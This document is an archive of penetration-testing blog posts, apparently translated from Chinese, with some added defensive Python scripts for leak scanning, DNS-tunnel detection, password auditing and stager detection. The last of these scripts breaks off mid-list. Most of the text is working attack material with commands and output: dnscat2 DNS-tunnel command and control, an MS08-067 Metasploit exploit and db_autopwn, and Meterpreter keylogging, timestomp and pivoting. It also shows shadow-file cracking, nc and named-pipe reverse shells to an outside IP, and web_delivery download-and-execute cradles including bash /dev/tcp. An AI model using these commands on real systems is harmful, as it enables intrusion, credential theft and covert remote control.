Category archive: Security Tools

Hawkeye: a GitHub leak monitoring system

GitHub is a common starting point for gaining a foothold in penetration tests. Sensitive information leaks through employees' lack of security awareness: for example, a script uploaded by an ops engineer contains the username and password of a personal mailbox; after logging in, the address book can be exported for further brute-forcing, and the mail contents can then be exported and searched for keywords such as VPN to pick up other key information.
GitHub search lets you combine keywords freely, for example:

"test.com" "smtp"
"test.com" "mail"
"test.com" "mysql"
"test.com" "jdbc"
"test.com" "svn"
"test.com" "pop"
"test.com" "ftp"

"test.com" "user"
"test.com" "username"
"test.com" "账号"

"test.com" "password"
"test.com" "passwd"
"test.com" "pwd"
"test.com" "pass"
"test.com" "密码"

"test.com" "内部"
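As an added example, not code from the original post or from the Hawkeye project, the following Python script applies the same idea locally: given a company domain, it scans file contents for lines that combine the domain with one of the credential keywords listed above, and additionally catches assignment-style secrets (MAIL_PASS="...", password: ...), redacting the value in the report so the finding itself does not re-leak it. The sample script content is constructed, and the assignment regex is an assumption that covers the keywords on this page plus "secret" and "token".

```python
import re

# Credential keywords the post combines with the company domain (taken from the list above)
CREDENTIAL_KEYWORDS = [
    "smtp", "mail", "mysql", "jdbc", "svn", "pop", "ftp",
    "user", "username", "password", "passwd", "pwd", "pass",
    "账号", "密码", "内部",
]

# Assignment-style secrets such as  MAIL_PASS="..."  or  password: ...  (assumed pattern)
ASSIGN_RE = re.compile(
    r"(?i)(password|passwd|pwd|pass|secret|token)\s*[=:]\s*['\"]?([^\s'\"]{4,})"
)

# Constructed sample of an ops script of the kind the post describes
SAMPLE_SCRIPT = """\
#!/bin/bash
# nightly mailbox sync (constructed example)
MAIL_HOST=smtp.test.com
MAIL_USER=ops@test.com
MAIL_PASS="Winter2017!"
echo "syncing to backup"
"""


def redact(value):
    """Keep only the first and last character so a report never re-leaks the secret."""
    if len(value) <= 2:
        return "*" * len(value)
    return value[0] + "*" * (len(value) - 2) + value[-1]


def scan_text(text, domain, keywords=CREDENTIAL_KEYWORDS):
    """Return (line_no, reason, snippet) for every suspicious line.

    A line is flagged when it carries an assignment-style secret, or when it
    mentions the company domain together with one of the credential keywords.
    """
    findings = []
    domain_l = domain.lower()
    for no, line in enumerate(text.splitlines(), 1):
        low = line.lower()
        m = ASSIGN_RE.search(line)
        if m:
            secret = m.group(2)
            findings.append((no, "assignment:" + m.group(1).lower(),
                             line.replace(secret, redact(secret))))
            continue
        if domain_l in low:
            hits = [k for k in keywords if k in low]
            if hits:
                findings.append((no, "keyword:" + ",".join(hits), line.strip()))
    return findings


if __name__ == "__main__":
    for no, reason, snippet in scan_text(SAMPLE_SCRIPT, "test.com"):
        print(f"line {no}: {reason}: {snippet}")
```

Run against a checkout (for example by feeding each file's contents to scan_text) the keyword branch reproduces the GitHub searches above, while the assignment branch catches hard-coded credentials that never mention the domain at all.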

A recommended GitHub leak monitoring system is available at:

https://github.com/0xbug/Hawkeye

Clone the project:

git clone https://github.com/0xbug/Hawkeye.git --depth 1

Install the dependencies (replace /usr/local/bin/python3 with the path to your system's Python 3):

cd Hawkeye
pip install virtualenv
virtualenv --python=/usr/local/bin/python3 venv
source venv/bin/activate
pip install -r deploy/requirements.txt

Configuration file:

cp config.ini.example config.ini
vim config.ini

GitHub account settings:

[GitHub]
USERNAME = <GitHub account>
PASSWORD = <password>

MongoDB authentication settings:

yum install mongodb
/usr/local/mongodb/bin/mongod -dbpath=/usr/local/mongodb/data -logpath=/usr/local/mongodb/logs
> use Hawkeye
switched to db Hawkeye
> db.addUser("git","hehe123")
{
	"user" : "git",
	"readOnly" : false,
	"pwd" : "2cb2f4cc98430db51a2335446fa84930",
	"_id" : ObjectId("59accc87fff25e9f045afc45")
}

[MongoDB]
HOST = localhost
PORT = 27017
ACCOUNT = git
PASSWORD = hehe123

Alert settings (ENABLE: whether alerting is turned on):

[Notice]
ENABLE = 1
MAIL_SERVER = <mail server>
MAIL_PORT = <SMTP port>
FROM = <sender address>
PASSWORD = <password>

python Hawkeye.py
Then open http://0.0.0.0:5000/ to configure keywords, alerts, blacklists and scheduled tasks.

DNScat2: bypassing the firewall with a DNS tunnel

0x01 Overview

Internal network egress is usually strictly filtered for outbound traffic, but DNS requests (UDP port 53) are generally allowed through. dnscat2 is a tool that builds an encrypted C&C channel over the DNS protocol to control hosts. It consists of a client and a server.

When the client runs, a domain name has to be specified. All requests are sent to the local DNS server, which forwards them to the authoritative DNS server for that domain.

If you do not have an authoritative DNS server, the client can also connect directly to UDP port 53. This is faster and still looks like ordinary DNS queries, but in the request logs every domain name begins with dnscat. This mode is often blocked by firewalls.

The server has to run on the authoritative DNS server and, like the client, needs the domain name specified.

0x02 Deployment

Client

$ git clone https://github.com/iagox86/dnscat2.git

$ cd dnscat2/client/

$ make

Server

yum install rubygems

gem install bundler

git clone https://github.com/iagox86/dnscat2.git

cd dnscat2/server

bundle install

0x03 Usage

If the target's internal network lets all DNS requests through, you can point the client at the server's host directly and communicate over UDP port 53.

If the internal network only allows communication with trusted DNS servers, you need to register a domain name and designate the host running the dnscat2 server as its authoritative DNS server. The first case is used as the example here:

On the server, run ruby ./dnscat2.rb:

root@kali:/tmp/dnscat2/server# ruby ./dnscat2.rb



New window created: 0

New window created: crypto-debug

dnscat2> Welcome to dnscat2! Some documentation may be out of date.



auto_attach => false

history_size (for new windows) => 1000

Security policy changed: All connections must be encrypted

New window created: dns1

Starting Dnscat2 DNS server on 0.0.0.0:53

[domains = n/a]...



It looks like you didn't give me any domains to recognize!

That's cool, though, you can still use direct queries,

although those are less stealthy.



To talk directly to the server without a domain name, run:



  ./dnscat --dns server=x.x.x.x,port=53 --secret=eca54e475210239dc87a7c9f2516c89a



Of course, you have to figure out <server> yourself! Clients

will connect directly on UDP port 53.

On the client, run:

[root@vincenthostname client]# ./dnscat --dns server=172.16.100.182,port=53 --secret=eca54e475210239dc87a7c9f2516c89a

Creating DNS driver:

 domain = (null)

 host   = 0.0.0.0

 port   = 53

 type   = TXT,CNAME,MX

 server = 172.16.100.182



** Peer verified with pre-shared secret!



Session established!

The server then shows the session being established:

New window created: 1

Session 1 Security: ENCRYPTED AND VERIFIED!

(the security depends on the strength of your pre-shared secret!)

dnscat2> session -i 1

New window created: 1

history_size (session) => 1000

Session 1 Security: ENCRYPTED AND VERIFIED!

(the security depends on the strength of your pre-shared secret!)

This is a command session!



That means you can enter a dnscat2 command such as

'ping'! For a full list of clients, try 'help'.

List the supported commands:

command (vincenthostname) 1> help



Here is a list of commands (use -h on any of them for additional help):

* clear

* delay

* download

* echo

* exec

* help

* listen

* ping

* quit

* set

* shell

* shutdown

* suspend

* tunnels

* unset

* upload

* window

* windows

Shell environment:

command (vincenthostname) 1> shell

Sent request to execute a shell

command (vincenthostname) 1> New window created: 2

Shell session created!



command (vincenthostname) 1> session -i 2

New window created: 2

history_size (session) => 1000

Session 2 Security: ENCRYPTED AND VERIFIED!

(the security depends on the strength of your pre-shared secret!)

This is a console session!



That means that anything you type will be sent as-is to the

client, and anything they type will be displayed as-is on the

screen! If the client is executing a command and you don't

see a prompt, try typing 'pwd' or something!



To go back, type ctrl-z.



sh (vincenthostname) 2> whoami

sh (vincenthostname) 2> root

sh (vincenthostname) 2> cat /etc/issue

sh (vincenthostname) 2> CentOS release 6.5 (Final)

Kernel \r on an \m

Downloading a file:

command (vincenthostname) 1> download /tmp/1.sh

Attempting to download /tmp/1.sh to 1.sh

command (vincenthostname) 1> Wrote 51 bytes from /tmp/1.sh to 1.sh!

root@kali:/tmp/dnscat2/server# ls 1.sh

1.sh

The captured traffic looks like this:

The domain names can be seen to start with dnscat.

0x04 Communicating with the PowerShell client

Server:

ruby ./dnscat2.rb --dns "domain=test,host=172.16.100.182" --no-cache

Client:

Download: https://github.com/lukebaggett/dnscat2-powershell/blob/master/dnscat2.ps1

Run in PowerShell:

IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/lukebaggett/dnscat2-powershell/master/dnscat2.ps1')

Start-Dnscat2 -Domain test -DNSServer 172.16.100.182

0x05 Defence

1) On the firewall, only allow communication with trusted DNS servers

2) As noted above, the default dnscat queries contain the string dnscat, which can be used as a signature by firewalls and intrusion detection

3) Log DNS queries and monitor for anomalies in frequency, length and record type
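As an added example, not part of the original post or of the dnscat2 project, the following Python script applies the three defensive measures above to a constructed DNS query log: it flags clients that talk to resolvers outside an allow-list, queries carrying the default dnscat label, and per-client anomalies in query rate, label length, label entropy and record-type mix (dnscat2's default TXT/CNAME/MX, as seen in the client banner above). The log format, the trusted resolver 10.0.0.53, the direct destination 203.0.113.7 and all thresholds are assumptions for this example.

```python
import math
from collections import defaultdict

# Record types dnscat2 uses by default (the client banner above shows TXT,CNAME,MX)
TUNNEL_QTYPES = {"TXT", "CNAME", "MX", "NULL"}
# Resolvers that internal clients are allowed to talk to (assumed allow-list)
TRUSTED_RESOLVERS = {"10.0.0.53"}

# Constructed query log: "<epoch> <client> <resolver> <qtype> <qname>", one query per line.
# 10.0.0.5 browses normally; 10.0.0.9 runs a dnscat-style direct tunnel to 203.0.113.7.
SAMPLE_LOG = """\
1500000000 10.0.0.5 10.0.0.53 A www.example.org
1500000001 10.0.0.5 10.0.0.53 AAAA mail.example.org
1500000002 10.0.0.5 10.0.0.53 A cdn.example.net
1500000000 10.0.0.9 203.0.113.7 TXT dnscat.0123456789abcdef0123456789abcdef0123456789abcdef
1500000000 10.0.0.9 203.0.113.7 CNAME dnscat.123456789abcdef0123456789abcdef0123456789abcdef0
1500000000 10.0.0.9 203.0.113.7 MX dnscat.23456789abcdef0123456789abcdef0123456789abcdef01
1500000000 10.0.0.9 203.0.113.7 TXT dnscat.3456789abcdef0123456789abcdef0123456789abcdef012
"""


def shannon_entropy(s):
    """Bits per character; hex-encoded tunnel data sits near 4.0, real hostnames far lower."""
    if not s:
        return 0.0
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def parse_log(text):
    """Turn the constructed log format into (ts, client, resolver, qtype, qname) tuples."""
    records = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 5:
            continue
        ts, client, resolver, qtype, qname = parts
        records.append((int(ts), client, resolver, qtype.upper(), qname.lower().rstrip(".")))
    return records


def longest_label(qname):
    return max(qname.split("."), key=len)


def analyze(records, max_qps=3.0, max_label_len=40, max_entropy=3.5, min_queries=3):
    """Return {client: [reasons]} for clients whose DNS traffic matches a tunnel profile.
    Thresholds are assumptions; tune them against your own baseline."""
    by_client = defaultdict(list)
    for rec in records:
        by_client[rec[1]].append(rec)
    alerts = {}
    for client, recs in by_client.items():
        reasons = []
        # 1) policy: DNS must go through the trusted resolvers only
        bad = sorted({r[2] for r in recs if r[2] not in TRUSTED_RESOLVERS})
        if bad:
            reasons.append("queries sent directly to untrusted resolver " + ",".join(bad))
        # 2) signature: dnscat2 direct queries carry a "dnscat" label by default
        if any(r[4].startswith("dnscat") or ".dnscat." in r[4] for r in recs):
            reasons.append("dnscat signature in qname")
        # 3) behaviour: query rate, label length, label entropy and record-type mix
        if len(recs) >= min_queries:
            span = max(r[0] for r in recs) - min(r[0] for r in recs) + 1
            qps = len(recs) / span
            if qps > max_qps:
                reasons.append(f"high query rate {qps:.1f}/s")
            labels = [longest_label(r[4]) for r in recs]
            if sum(map(len, labels)) / len(labels) > max_label_len:
                reasons.append("unusually long labels")
            if sum(map(shannon_entropy, labels)) / len(labels) > max_entropy:
                reasons.append("high label entropy")
            share = sum(1 for r in recs if r[3] in TUNNEL_QTYPES) / len(recs)
            if share > 0.5:
                reasons.append(f"{share:.0%} TXT/CNAME/MX/NULL queries")
        if reasons:
            alerts[client] = reasons
    return alerts


if __name__ == "__main__":
    for client, reasons in analyze(parse_log(SAMPLE_LOG)).items():
        print(client)
        for reason in reasons:
            print("  -", reason)
```

The signature check alone is defeated as soon as the operator runs the server with a registered domain (as in 0x04 above), which is why the rate, length, entropy and record-type checks are kept separate: a tunnel over a legitimate domain still has to move data through long, high-entropy labels at a rate a browser never produces.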


Reference:

https://www.anquanke.com/post/id/85764

Automated msf attacks on Kali

I. Database connection setup
1) Start the service
service postgresql start
Check port 5432
root@kali-vincent:~# netstat -anlp | grep post
tcp 0 0 127.0.0.1:5432 0.0.0.0:* LISTEN 25851/postgres
2) Enter the PostgreSQL console
sudo -u postgres psql
alter user postgres with password 'admin';
3) Change the password of the Linux postgres user (use the same password as the database user postgres)
root@kali:~# sudo passwd -d postgres
passwd:密码过期信息已更改。
root@kali:~# sudo -u postgres passwd
输入新的 UNIX 密码:
重新输入新的 UNIX 密码:
passwd:已成功更新密码
4) Manage PostgreSQL users and databases
root@kali:~# psql -U postgres -h 127.0.0.1
postgres=# create user msf with password 'admin' nocreatedb;
CREATE ROLE

postgres=# create database msf with owner=msf;
CREATE DATABASE
postgres=# \q
5) Connect msf to the database
root@kali:~# msfconsole
msf > db_status
[*] postgresql selected, no connection
msf > db_connect msf:admin@127.0.0.1/msf
[*] Rebuilding the module cache in the background…
msf > db_status
[*] postgresql connected to msf
msf >
db_connect -y /usr/share/metasploit-framework/config/database.yml
6) Configure automatic connection
Edit /usr/share/metasploit-framework/config/database.yml:
development: &pgsql
  adapter: postgresql
  database: msf
  username: msf
  password: admin
  host: localhost
  port: 5432
  pool: 5
  timeout: 5
Run db_status to verify the database connection
msf > db_status
[*] postgresql connected to msf

II. Scanning into the database
Running db_nmap inside msfconsole starts the scan and stores the results in the database automatically.
msf > db_nmap -sS -A 172.16.100.134
View the scan results
msf > services
[-] The db_services command is DEPRECATED
[-] Use services instead

Services
========

host            port  proto  name        state  info
----            ----  -----  ----        -----  ----
172.16.100.134  22    tcp    ssh         open   OpenSSH 5.3 protocol 2.0
172.16.100.134  23    tcp    telnet      open
172.16.100.134  80    tcp    http        open   Apache httpd 2.2.15 (CentOS)
172.16.100.134  111   tcp    rpcbind     open   2-4 RPC #100000
172.16.100.134  873   tcp    rsync       open   protocol version 30
172.16.100.134  2222  tcp    tcpwrapped  open
View the target information in the database
msf > hosts

Hosts
=====

address         mac                name  os_name  os_flavor  os_sp  purpose  info  comments
-------         ---                ----  -------  ---------  -----  -------  ----  --------
172.16.100.134  00:0c:29:b0:78:39        Linux    2.6.X             server
Use hosts -d <ip> to delete an IP
Check the msf version
msf > version
Framework: 4.11.4-2015071403
Console : 4.11.4-2015071403.15168
The db_autopwn automated attack has been removed from the framework since version 4.5. Download it from
http://download.csdn.net/download/terrying/5063334
and place it under /usr/share/metasploit-framework/plugins.
db_autopwn -t -p -e (automatically attacks all IPs)
msf > db_autopwn -t -p -e
A meterpreter session is then obtained:
[*] Meterpreter session 3 opened (172.16.100.128:55153 -> 172.16.100.166:10413) at 2016-07-02 11:10:23 +0800

Testing the MS08-067 vulnerability with Metasploit

1) MS08-067 description
The full name of MS08-067 is "Windows Server service RPC request buffer overflow vulnerability": if a user on an affected system receives a specially crafted RPC request, the vulnerability could allow remote code execution.
MS08-067 affects all Windows systems except Windows Server 2008 Core, including every version of Windows 2000/XP/Server 2003/Vista/Server 2008, and even the Windows 7 Pre-Beta that was in testing at the time.
2) Exploitation
Test environment: Windows 2000
First scan with nmap:
C:\Users\dell>nmap -sS -A --script=smb-check-vulns --script-args=unsafe=1 -P0 172.16.100.166
Host script results:
| smb-check-vulns:
| MS08-067: VULNERABLE
| Conficker: Likely CLEAN
| SMBv2 DoS (CVE-2009-3103): NOT VULNERABLE
| MS06-025: NO SERVICE (the Ras RPC service is inactive)
|_ MS07-029: NO SERVICE (the Dns Server RPC service is inactive)
The output reports MS08-067: VULNERABLE
Then use Metasploit:
msf exploit(handler) > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set rhost 172.16.100.166
rhost => 172.16.100.166
msf exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 172.16.100.128:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows 2000 - - lang:Chinese - Traditional
[*] Selected Target: Windows 2000 Universal
[*] Attempting to trigger the vulnerability...
[*] Sending stage (885806 bytes) to 172.16.100.166
[*] Meterpreter session 2 opened (172.16.100.128:4444 -> 172.16.100.166:1030) at 2016-06-29 09:46:54 +0800

meterpreter >

Meterpreter commands explained

Basic commands:
background # put meterpreter into the background
sessions -i number # interact with a session; number is the nth session
quit # exit the session
shell # get a command shell

meterpreter > shell
Process 320 created.
Channel 1 created.
Microsoft Windows [版本 5.2.3790]
(C) 版权所有 1985-2003 Microsoft Corp.

C:\Documents and Settings\Administrator\桌面>

cat c:\\boot.ini # view a file's contents
getwd # show the current working directory
upload /root/Desktop/netcat.exe c:\\ # upload a file to the target
download 0xfa.txt /root/Desktop/ # download a file to the local machine
edit c:\\boot.ini # edit a file
search -d d:\\www -f web.config # search for a file
ps # list the active processes
migrate pid # migrate the Meterpreter session into the process with the given pid

meterpreter > migrate 3552
[*] Migrating from 904 to 3552...
[*] Migration completed successfully.

execute -H -i -f cmd.exe # start a new cmd.exe process; -H hidden, -i interactive
getpid # get the pid of the current process
kill pid # kill a process
getuid # show the current privileges
sysinfo # show target system information such as hostname and operating system
getsystem # privilege escalation
timestomp c:/a.doc -c "10/27/2015 14:22:11" # change a file's creation time

Keystroke logging:

meterpreter > keyscan_start
Starting the keystroke sniffer...
meterpreter > keyscan_dump
Dumping captured keystrokes...
whoami <Return> dir <Return>
meterpreter > keyscan_stop
Stopping the keystroke sniffer...

Port forwarding:

meterpreter > portfwd add -l 4444 -p 3389 -r 172.16.100.131
[*] Local TCP relay created: 0.0.0.0:4444 <-> 172.16.100.131:3389

Then check the local listener:

root@kali-vincent:/usr/share/metasploit-framework/config# netstat -ano | grep 4444
tcp 0 0 0.0.0.0:4444 0.0.0.0:* LISTEN off (0.00/0/0)

Pivoting into the internal network:

This is the most commonly used form of proxying in meterpreter; it lets you route your own machine into the victim's internal network.
Add a second network adapter to the Windows 2003 VM, set it to host-only mode and give it an address on a different subnet, 10.11.100.1, which Kali cannot reach.

msf exploit(handler) > route add 10.11.100.1 255.255.255.0 3
[*] Route added
msf exploit(handler) > route print

Active Routing Table
====================

Subnet Netmask Gateway
------ ------- -------
10.11.100.1 255.255.255.0 Session 3

Alternatively, the route can be added directly from meterpreter:

meterpreter > run autoroute -s 10.11.100.1
[*] Adding a route to 10.11.100.1/255.255.255.0...
[+] Added route to 10.11.100.1/255.255.255.0 via 172.16.100.131
[*] Use the -p option to list all active routes

Other modules can now be used against the internal network. To let other applications reach it as well, use the auxiliary/server/socks4a module. Note that Proxychains does not support ICMP, so nmap must be run with -sT -Pn when going through the proxy.

msf auxiliary(smb_login) > use auxiliary/server/socks4a
msf auxiliary(socks4a) > exploit
[*] Auxiliary module execution completed

[*] Starting the socks4a proxy server

Then check the listening port:

root@kali-vincent:/usr/share/metasploit-framework/config# netstat -ano | grep 1080
tcp 0 0 0.0.0.0:1080 0.0.0.0:* LISTEN off (0.00/0/0)
vim /etc/proxychains.conf
Add the line socks4 127.0.0.1 1080

Then proxychains nmap -sS -v 10.11.100.1 scans the internal network through the proxy

Installing and using John the Ripper 1.8

1) Installation:
Following the official documentation:
1. wget http://www.openwall.com/john/j/john-1.8.0.tar.gz
2. tar xzvf john-1.8.0.tar.gz
3. cd john-1.8.0
4. cd src
5. make
6. make clean generic
2) Usage on Linux
1. cd ../run/
2. cp /etc/passwd /etc/shadow . // note the trailing ".": it copies into the current directory
3. ./unshadow passwd shadow >mypasswd
4. ./john mypasswd
####################################################
But running it gives an error:
[root@server120 run]# ./john mypasswd
No password hashes loaded (see FAQ)
Solution:
1、cd src
2、make
3、make linux-x86-64
####################################################
3) Cracking modes
--single
If the account name is admin and its password is admin plus some digits such as 123 or 000, this mode applies; the rules are defined in [List.Rules:Single] in john.conf.
john --single mypasswd
Several password files can be loaded at once:
john --single passwd1 passwd2
or john --single *passwd* *.pwd
--wordlist
Crack with a dictionary. The dictionary is /john-1.*/run/password.lst; you can also generate one by hand and load it.
[root@server120 run]# ./john --wordlist=password.txt mypasswd
Loaded 2 password hashes with 2 different salts (crypt, generic crypt(3) [?/64])
Press 'q' or Ctrl-C to abort, almost any other key for status
hehe123 (vincent)
1g 0:00:00:00 100% 11.11g/s 33.33p/s 66.66c/s 66.66C/s xyxyxyxyx..hehe123
Use the "--show" option to display all of the cracked passwords reliably
Session completed
View the results:
[root@server120 run]# ./john --show mypasswd
vincent:hehe123:501:501::/home/vincent:/bin/bash

1 password hash cracked, 1 left
The rule-mangling feature --rules can be enabled; for the word cook, for example, it tries cook, c00k, cooker and other variants. The rules are recorded in [List.Rules:Wordlist].
--incremental
This mode tries every combination of characters as the password; naturally it takes a very long time.
--external
This mode loads a program written in a C-like language and cracks with it.
Running ./john mypasswd with no options tries single crack first, then the wordlist, and finally exhaustive (incremental) cracking.
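As an added example, not part of the original post or of John the Ripper, the following Python code turns the single and wordlist-rules modes described above into a password audit that can run before a password is accepted: it derives the same kind of variants the post mentions (cook, c00k, cooker, plus case changes and appended digits) from a small dictionary and from the account name, and reports which base word and rule a candidate password comes from. The rule subset, suffix list and dictionary are assumptions and are far smaller than john.conf's.

```python
# Suffixes and character substitutions standing in for a few [List.Rules:Wordlist] rules (assumed subset)
SUFFIXES = ["1", "12", "123", "!", "2015", "2016", "2017", "er", "s"]
LEET = str.maketrans({"a": "@", "e": "3", "i": "1", "o": "0", "s": "$"})

# Constructed dictionary standing in for run/password.lst
WORDLIST = ["cook", "password", "welcome", "summer"]


def variants(word):
    """Yield (candidate, rule) pairs derived from one word, cheapest rules first."""
    base = word.lower()
    forms = {}
    for form, rule in [(base, "lowercase"), (base.capitalize(), "capitalize"),
                       (base.upper(), "uppercase"), (base.translate(LEET), "leet"),
                       (base[::-1], "reverse")]:
        forms.setdefault(form, rule)  # keep the first rule that produced a given form
    for form, rule in forms.items():
        yield form, rule
        for suffix in SUFFIXES:
            yield form + suffix, rule + "+append '" + suffix + "'"
        for n in range(100):
            yield form + str(n), rule + "+append digits"


def is_weak(password, wordlist=WORDLIST, username=None):
    """Return (base_word, rule) when the password derives from the account name
    (single mode) or from a dictionary word (wordlist mode with rules); None otherwise."""
    if username:
        for cand, rule in variants(username):
            if cand == password:
                return username, "single:" + rule
    for word in wordlist:
        for cand, rule in variants(word):
            if cand == password:
                return word, "wordlist:" + rule
    return None


if __name__ == "__main__":
    for user, pw in [("admin", "admin123"), ("vincent", "c00k"), ("vincent", "cooker"),
                     ("vincent", "correct horse battery staple")]:
        print(user, pw, "->", is_weak(pw, username=user) or "not derived from a known word")
```

The check is deliberately the attacker's own procedure run in reverse: anything this small rule set can derive would fall to john's default wordlist run within seconds, so rejecting it at password-change time costs nothing and removes the cheapest cracks first.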

Reference: http://www.openwall.com/john/doc/EXAMPLES.shtml

Using nc in penetration testing

Installing nc

1. Download nc from SourceForge with wget
wget http://sourceforge.net/projects/netcat/files/netcat/0.7.1/netcat-0.7.1.tar.gz/download -O netcat-0.7.1.tar.gz
2. Extract it
tar zxvf netcat-0.7.1.tar.gz
3. Configure before building
cd netcat-0.7.1
./configure
4. Build
make
5. Run
After the build, enter the src directory
./netcat -h

Transferring files with nc

On the receiving machine:
[vincent@iZ62luqzx5xZ src]$ ./netcat -v -l -p 2345 > /tmp/user.txt
On the sending machine:
root@kali-vincent:/tmp# nc -v 49.213.15.229 2345 < user.txt

Reverse shells with nc

Bind (forward) connection:
On the remote machine:
nc -l -p 8888 -t -e cmd.exe
On the local machine:
nc -nvv 172.16.100.111 8888
On success, the local machine has a shell on the remote machine.

Reverse connection:
First listen on a port locally with nc
nc -vv -l -p 8081
Then on the remote end:
nc -vv 192.168.192.201 8081 -e /bin/bash
The local side receives the shell

Most Linux distributions ship nc by default, but, presumably for security reasons, the distribution build usually lacks the -e option (the GAPING_SECURITY_HOLE constant is not defined), so the target's shell cannot be bound with -e, which limits its use.
The attacker side still listens on a port with nc -lnvp listenport; on the target, run the following commands in order:
root@kali-vincent:~# mknod /tmp/backpipe p
root@kali-vincent:~# /bin/sh 0</tmp/backpipe | nc 49.213.15.229 2345 1>/tmp/backpipe
The first command uses mknod to create a named pipe backpipe under /tmp. The second redirects the default shell's input from that pipe, sends its output through nc attackerip listenport to the attacker, and finally redirects the shell's results back into the pipe.

Metasploit Web Delivery

Metasploit's Web Delivery module starts a web server on Kali whose content contains the payload.

Python


msf > use exploit/multi/script/web_delivery
msf exploit(web_delivery) > set payload python/meterpreter/reverse_tcp
payload => python/meterpreter/reverse_tcp
msf exploit(web_delivery) > set lhost 172.16.100.182
lhost => 172.16.100.182
msf exploit(web_delivery) > run
[*] Exploit running as background job.

[*] Started reverse TCP handler on 172.16.100.182:4444 
[*] Using URL: http://0.0.0.0:8080/7UBHdklf
[*] Local IP: http://172.16.100.182:8080/7UBHdklf
[*] Server started.
[*] Run the following command on the target machine:
Python:
python -c "import sys; u=__import__('urllib'+{2:'',3:'.request'}[sys.version_info[0]],fromlist=('urlopen',));r=u.urlopen('http://172.16.100.182:8080/7UBHdklf');exec(r.read());"
root@kali:~# netstat -antlp | grep 8080
tcp 0 0 0.0.0.0:8080 0.0.0.0:* LISTEN 5657/ruby

Run the Python one-liner on the test machine:

msf exploit(web_delivery) > [*] 172.16.100.1 web_delivery - Delivering Payload
[*] Sending stage (42231 bytes) to 172.16.100.1
[*] Meterpreter session 1 opened (172.16.100.182:4444 -> 172.16.100.1:7292) at 2017-09-14 17:39:42 +0800
[+] negotiating tlv encryption
[+] negotiated tlv encryption
[+] negotiated tlv encryption

msf exploit(web_delivery) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo 
Computer : dell-PC
OS : Windows 7 (Build 7601, Service Pack 1)
Architecture : x64
System Language : zh_CN
Meterpreter : python/windows

Powershell


msf > use exploit/multi/script/web_delivery
msf exploit(web_delivery) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(web_delivery) > set lhost 172.16.100.182
lhost => 172.16.100.182
msf exploit(web_delivery) > set target 2
target => 2
msf exploit(web_delivery) > run
[*] Exploit running as background job.

[*] Started reverse TCP handler on 172.16.100.182:4444 
[*] Using URL: http://0.0.0.0:8080/AwOpQNolkZNZz
[*] Local IP: http://172.16.100.182:8080/AwOpQNolkZNZz
[*] Server started.
[*] Run the following command on the target machine:
powershell.exe -nop -w hidden -c $z=new-object net.webclient;$z.proxy=[Net.WebRequest]::GetSystemWebProxy();$z.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $z.downloadstring('http://172.16.100.182:8080/AwOpQNolkZNZz');

Run the PowerShell command on the test machine:

msf exploit(web_delivery) > [*] 172.16.100.1 web_delivery - Delivering Payload
[*] Sending stage (171583 bytes) to 172.16.100.1
[*] Meterpreter session 1 opened (172.16.100.182:4444 -> 172.16.100.1:7336) at 2017-09-14 17:46:00 +0800
[+] negotiating tlv encryption
[+] negotiated tlv encryption
[+] negotiated tlv encryption

PHP


msf > use exploit/multi/script/web_delivery
msf exploit(web_delivery) > set payload php/exec
payload => php/exec
msf exploit(web_delivery) > set target 1
target => 1
msf exploit(web_delivery) > set cmd "bash -i >& /dev/tcp/192.168.192.120/2345 0>&1"
cmd => bash -i >& /dev/tcp/192.168.192.120/2345 0>&1
msf exploit(web_delivery) > show options

Module options (exploit/multi/script/web_delivery):

Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)



Payload options (php/exec):

Name Current Setting Required Description
---- --------------- -------- -----------
CMD bash -i >& /dev/tcp/192.168.192.120/2345 0>&1 yes The command string to execute



Exploit target:

Id Name
-- ----
1 PHP



msf exploit(web_delivery) > run
[*] Exploit running as background job.

[*] Using URL: http://0.0.0.0:8080/ZuvhhHCImHt5wT1
[*] Local IP: http://172.16.100.182:8080/ZuvhhHCImHt5wT1
[*] Server started.
[*] Run the following command on the target machine:
php -d allow_url_fopen=true -r "eval(file_get_contents('http://172.16.100.182:8080/ZuvhhHCImHt5wT1'));"
msf exploit(web_delivery) > [*] 172.16.100.161 web_delivery - Delivering Payload

The reverse shell is received:

[root@server120 ~]# nc -vv -l -p 2345
Listening on any address 2345 (dbm)
Connection from 192.168.190.201:64671
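The three stager commands printed by web_delivery in this post (python -c with urlopen and exec, powershell -nop -w hidden with IEX and downloadstring, php -r with eval(file_get_contents(...))) are exactly what a defender should hunt for in process-creation telemetry. As an added example, not part of the original post or of Metasploit, the script below matches constructed command lines against an indicator set for each cradle and pulls out the download URL for blocking. The event layout (host, pid, cmdline) and the indicator sets are assumptions; the command lines themselves are taken from the output above, mixed with benign look-alikes.

```python
import re

# Indicator sets per download cradle; every pattern in a set must match for the rule to fire (assumed)
RULES = {
    "powershell download cradle": [
        r"(?i)\bpowershell", r"(?i)-nop\b|-noprofile",
        r"(?i)-w\s+hidden|-windowstyle\s+hidden",
        r"(?i)\b(iex|invoke-expression)\b", r"(?i)downloadstring|downloadfile",
    ],
    "python urlopen+exec one-liner": [
        r"(?i)\bpython\S*\s", r"\s-c\s", r"urlopen\(", r"\bexec\(",
    ],
    "php remote eval": [
        r"(?i)\bphp\s", r"\s-r\s", r"\beval\(", r"file_get_contents\(\s*['\"]https?://",
    ],
}
URL_RE = re.compile(r"https?://[^\s'\")]+")

# Constructed process-creation events: the three stagers from this post plus benign look-alikes
SAMPLE_EVENTS = [
    {"host": "dell-PC", "pid": 4120, "cmdline":
        "powershell.exe -nop -w hidden -c $z=new-object net.webclient;"
        "$z.proxy=[Net.WebRequest]::GetSystemWebProxy();"
        "$z.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;"
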